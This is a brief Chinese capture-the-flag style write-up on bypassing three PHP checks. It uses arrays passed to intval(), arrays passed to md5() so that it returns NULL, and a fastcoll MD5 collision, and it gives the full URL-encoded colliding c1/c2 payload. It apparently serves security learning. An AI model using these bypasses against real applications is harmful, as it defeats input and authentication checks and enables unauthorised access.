第一层if使用数组绕过。
<?php var_dump(intval(array())); //int(0) var_dump(intval(array(2,3,4))); //int(1) var_dump(intval(array('aa','bb','cc'))); //int(1)
第二层if使用空数组绕过:md5函数处理数组时会报错并返回NULL
第三层if使用md5碰撞绕过:使用fastcoll工具
c1=thanks%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%3DM%2A%A7%D8%88%AF5%A7%05%AF%B2Z%DC%E2%0BfD%D0%40%60%DE%F8%AE%11%BE%3A%E5%14%12%2A%0C%3B%E2%EB%E5%EAE%0E%99G%28%C2%11%E61%E8z%89%07%A3%F1%18%C2t%EF%C1%7F%CF%2F%81-%2Fj%A9%D2%1F%E7%2B%F7s%AE%97%89%EF%01%5B%F7Q%CA%1E%8EB%22%03%86%16k%CBZ%F6M%ECG%FE%ED%CE%85F%17%F2O%FC%0D%B8%1FhO%09U%82%EA8%16%B9%AB%C16%F0%AB%D0%8D%F2S%C1%7B%86%96&c2=thanks%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%3DM%2A%A7%D8%88%AF5%A7%05%AF%B2Z%DC%E2%0BfD%D0%C0%60%DE%F8%AE%11%BE%3A%E5%14%12%2A%0C%3B%E2%EB%E5%EAE%0E%99G%28%C2%11%E6%B1%E8z%89%07%A3%F1%18%C2t%EF%C1%7F%CF%AF%81-%2Fj%A9%D2%1F%E7%2B%F7s%AE%97%89%EF%01%5B%F7Q%CA%1E%8EB%A2%03%86%16k%CBZ%F6M%ECG%FE%ED%CE%85F%17%F2O%FC%0D%B8%1FhO%09%D5%81%EA8%16%B9%AB%C16%F0%AB%D0%8D%F2%D3%C1%7B%86%96
